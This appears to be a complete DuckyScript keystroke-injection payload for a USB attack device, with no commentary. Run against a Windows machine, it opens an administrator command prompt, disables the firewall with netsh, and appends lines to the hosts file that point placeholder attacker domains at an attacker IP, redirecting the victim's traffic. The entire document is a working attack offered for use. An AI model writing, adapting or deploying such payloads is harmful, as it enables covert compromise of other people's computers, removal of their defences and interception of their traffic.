ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 400
ENTER
DELAY 800
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
STRING ECHO attackerip attackerdomain >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
STRING ECHO attackerip www.attackerdomain >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
STRING exit
ENTER
